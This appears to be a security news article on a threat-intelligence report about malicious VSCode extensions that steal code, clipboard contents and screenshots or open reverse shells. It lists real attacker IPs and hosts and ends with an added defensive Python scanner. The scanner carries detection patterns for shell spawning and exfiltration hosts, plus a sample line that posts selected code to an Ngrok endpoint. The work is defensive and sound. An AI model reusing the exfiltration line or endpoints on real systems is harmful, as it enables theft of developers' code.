The HelixGuard Threat Intelligence Team has uncovered a widespread supply chain compromise affecting the Visual Studio Code (VSCode) extension marketplace, identifying at least 12 malicious plugins, four of which remained live at the time of discovery. These extensions were found to steal source code, exfiltrate credentials, capture screenshots, and even open remote shells on developer machines.
The extensions—hosted both on the official Microsoft VSCode Marketplace and OpenVSX—target developers using AI-assisted coding and DevOps tools. This marks a growing trend where attackers exploit integrated development environments (IDEs) as a supply chain infiltration vector, similar to earlier compromises seen in npm and PyPI ecosystems.
As VSCode cements its status as the world’s most popular code editor, attackers have begun weaponizing its extension ecosystem.
HelixGuard cites research from an arXiv study titled “Developers Are Victims Too: A Comprehensive Analysis of the VS Code Extension Ecosystem”, noting that “approximately 5.6% (2,969) of 52,880 extensions exhibit suspicious behavior, with these suspicious extensions accumulating 613 million installs.”
The report warns that malicious IDE extensions now act as full-fledged malware loaders: “Attackers may use malicious IDE plugins to steal code from developers’ hosts, pilfer sensitive data from the clipboard, and establish remote backdoors, posing high security risks.”
HelixGuard detailed each plugin’s capabilities, exposing how they quietly integrate malicious JavaScript code within legitimate VSCode workflows. Among the most notable were:
1. Christine-devops1234.scraper — Source code theft via hardcoded server
This plugin exfiltrates project names, file contents, search queries, selected code, and even images to an attacker-controlled endpoint 35.164.75.62:8080.
HelixGuard reports: “The Christine-devops1234.scraper VSCode plugin steals sensitive data such as user machine ID, project names, source code file contents, search queries, chat prompts, selected code, and images.”
2. Kodease.fyp-23-s2-08 — Exfiltration to Ngrok tunnel
This plugin sends user code snippets to an Ngrok relay at 9691-34-83-7-143.ngrok-free.app. The injected script posts selected code directly after being processed:
HelixGuard noted, “The Kodease.fyp-23-s2-08 VSCode plugin sends user code to an attacker-controlled Ngrok server.”
3. teste123444212.teste123444212 — Persistent remote backdoor
This plugin connects to an AWS EC2 instance (ec2-18-222-167-218.us-east-2.compute.amazonaws.com:443) and allows the attacker to execute arbitrary commands.
The embedded code creates a reverse shell, granting direct access to the victim’s terminal:
HelixGuard explains, “The plugin establishes a persistent connection with an attacker-controlled server, allowing remote code execution on the user’s host.”
4. ToToRoManComp.diff-tool-vsc — Linux shell backdoor
A sophisticated payload in this plugin establishes a shell session to a remote IP (89.104.69.35:445), executed via obfuscated Bash commands.
After decoding, the script reveals a Perl-based reverse shell:
5. BX-Dev.Blackstone-DLP — Clipboard and screenshot surveillance
This plugin periodically captures screenshots and clipboard data and uploads them to CloudFront under d1hnchthod2r9c.cloudfront.net.
The report states, “The BX-Dev.Blackstone-DLP VSCode plugin steals user information such as screen captures and clipboard contents.”
Several malicious components demonstrate installation detection and anti-analysis capabilities.
For example, the GuyNachshon.cxcx123 extension performs a network beacon upon installation, contacting a webhook at https://webhook.site/daea041c-4c7b-4c56-97cf-1d6b2be569b5. HelixGuard highlights that “this behavior allows attackers to detect outbound connectivity of the user’s host and verify infection.”
Meanwhile, VKTeam.ru, one of the most complex threats, gathers system metadata, including usernames, hostnames, and domain names, sending them to 188.124.39.62.
Its code dynamically constructs a Base64-encoded payload containing victim data and sends it over HTTP using Axios.
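As an added, defender-side example (not HelixGuard's tooling and not code from any of the extensions described), the script below triages a local VS Code extensions directory: it flags any extension whose `publisher.name` matches an ID named in this article, greps extension JavaScript for the network indicators quoted above, and applies a few generic heuristics (shell spawning, raw sockets, throwaway webhook or tunnel hosts, clipboard or screenshot access) that warrant a manual look. The heuristic regexes, the `~/.vscode/extensions` layout assumption and the sample snippet in `SAMPLE_EXTENSION_JS` are constructed for illustration.

```python
"""Triage scanner for locally installed VS Code extensions.

Added example, not HelixGuard's code. Extension IDs and network indicators
are taken from the article; the heuristics and directory layout are
assumptions of this example.
"""
import json
import re
from pathlib import Path

# Extension IDs (publisher.name) named in the report.
KNOWN_BAD_EXTENSIONS = {
    "Christine-devops1234.scraper",
    "Kodease.fyp-23-s2-08",
    "teste123444212.teste123444212",
    "ToToRoManComp.diff-tool-vsc",
    "BX-Dev.Blackstone-DLP",
    "GuyNachshon.cxcx123",
    "VKTeam.ru",
}

# Network indicators quoted in the report.
NETWORK_IOCS = [
    "35.164.75.62",
    "9691-34-83-7-143.ngrok-free.app",
    "ec2-18-222-167-218.us-east-2.compute.amazonaws.com",
    "89.104.69.35",
    "d1hnchthod2r9c.cloudfront.net",
    "webhook.site/daea041c-4c7b-4c56-97cf-1d6b2be569b5",
    "188.124.39.62",
]

# Generic heuristics (assumptions, not from the report). They are noisy on
# bundled dependencies, so node_modules is skipped by default below.
HEURISTICS = {
    "spawns_shell": re.compile(r"child_process|spawn\s*\(\s*['\"](?:/bin/)?(?:ba)?sh['\"]"),
    "raw_socket": re.compile(r"net\.(?:Socket|connect)\s*\("),
    "disposable_callback_host": re.compile(r"webhook\.site|ngrok-free\.app"),
    "clipboard_or_screenshot": re.compile(r"clipboard|screenshot", re.IGNORECASE),
}

# Constructed sample resembling the exfiltration described for item 2 above.
SAMPLE_EXTENSION_JS = (
    "const axios = require('axios');\n"
    "axios.post('https://9691-34-83-7-143.ngrok-free.app/upload', {code: selected});\n"
)


def scan_extension(extension_id, js_sources):
    """Return (severity, detail) findings for one extension.

    js_sources maps a relative file path to its text, so the matching logic
    can be exercised without touching the filesystem.
    """
    findings = []
    if extension_id in KNOWN_BAD_EXTENSIONS:
        findings.append(("critical", f"{extension_id} is named in the HelixGuard report"))
    for rel_path, text in js_sources.items():
        for ioc in NETWORK_IOCS:
            if ioc in text:
                findings.append(("critical", f"{rel_path}: known indicator {ioc}"))
        for label, pattern in HEURISTICS.items():
            if pattern.search(text):
                findings.append(("review", f"{rel_path}: heuristic {label}"))
    return findings


def load_extension_dir(ext_dir, include_deps=False):
    """Read publisher.name from package.json and collect the JS under it."""
    manifest = json.loads((ext_dir / "package.json").read_text(encoding="utf-8"))
    extension_id = f"{manifest.get('publisher', '?')}.{manifest.get('name', '?')}"
    sources = {}
    for js in ext_dir.rglob("*.js"):
        if not include_deps and "node_modules" in js.parts:
            continue
        sources[str(js.relative_to(ext_dir))] = js.read_text(encoding="utf-8", errors="replace")
    return extension_id, sources


def scan_extensions_root(root=Path.home() / ".vscode" / "extensions", include_deps=False):
    """Scan every installed extension; returns {extension_id: findings}."""
    report = {}
    for ext_dir in sorted(Path(root).iterdir()):
        if not (ext_dir / "package.json").is_file():
            continue
        extension_id, sources = load_extension_dir(ext_dir, include_deps)
        findings = scan_extension(extension_id, sources)
        if findings:
            report[extension_id] = findings
    return report


def demo():
    """Run the scanner over the constructed sample; returns its findings."""
    return scan_extension("Kodease.fyp-23-s2-08", {"out/extension.js": SAMPLE_EXTENSION_JS})


if __name__ == "__main__":
    for severity, detail in demo():
        print(f"[{severity}] {detail}")
    for ext_id, findings in scan_extensions_root().items():
        for severity, detail in findings:
            print(f"[{severity}] {ext_id}: {detail}")
```

Run it as-is to see the constructed sample light up, then against a real extensions directory; on the sample it reports the known extension ID, the Ngrok indicator, and the disposable-host heuristic. String-matching indicators from one report is a point-in-time check, so treat the heuristic hits as leads for review rather than verdicts, and re-run the scan whenever new IoCs are published.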
The HelixGuard team warns that malicious VSCode extensions can serve as initial access points into corporate networks, given the level of integration between development tools and production systems.
“Malware in IDE plugins is a supply chain attack channel that enterprise security teams need to take seriously,” the researchers emphasize.
Once a developer’s IDE is compromised, attackers can pivot into internal repositories, inject code into builds, or exfiltrate intellectual property. This makes IDE-level malware particularly dangerous for DevOps pipelines and AI-assisted codebases.